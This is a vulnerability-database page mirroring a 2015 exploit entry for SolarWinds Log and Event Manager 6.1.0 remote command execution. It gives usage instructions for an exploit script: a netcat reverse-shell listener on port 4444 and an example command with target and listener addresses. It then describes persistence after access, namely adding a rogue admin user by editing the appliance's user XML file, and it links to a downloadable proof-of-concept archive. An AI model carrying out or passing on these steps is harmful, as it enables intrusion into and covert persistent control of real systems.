Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution Exploit

🗓️ 06 Nov 2015 00:00:00Reported by Chris GrahamType 
zdt
 zdt🔗 0day.today👁 38 Views

Solarwinds Log & Event Manager/Trigeo SIM Remote Command Execution Exploit for Vulnerable Appliance v6.1.0 on Ubuntu 14.04 LT

Code
Requirements:
 
Python 2.7
netcat
 
Tested on: 
Ubuntu 14.04 LTS
 
Vulnerable Appliance Version: 6.1.0
Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe
 
Instructions:
 
The exploit_lem.py script will need to be run sudo since it uses sockets
which bind to port 21 and 80. These could be changed, but the rest of 
the script would need to be modified as well. 
 
Prior to running the python script, set up a netcat listener for the
reverse shell: netcat -l 4444
 
Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444
 
After access has been gained to the appliance, a new admin user can be added to the web console
by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure 
for the admin user that is already in there and then change the fields to create a new user. In
order to get a valid password hash, use the gen_pass_hash.py script included with this package. 
Please note that a manager restart will be needed before you can login with the new user. This 
can be accomplished by running "/etc/init.d/contego-manager restart"
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip

#  0day.today [2018-04-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Nov 2015 00:00Current
7.1High risk
Vulners AI Score7.1
solarwindstrigeo simremote command executionexploitvulnerable applianceubuntu 14.04 ltspython 2.7netcatreverse shelladmin userpassword hashproof of concept0day today
38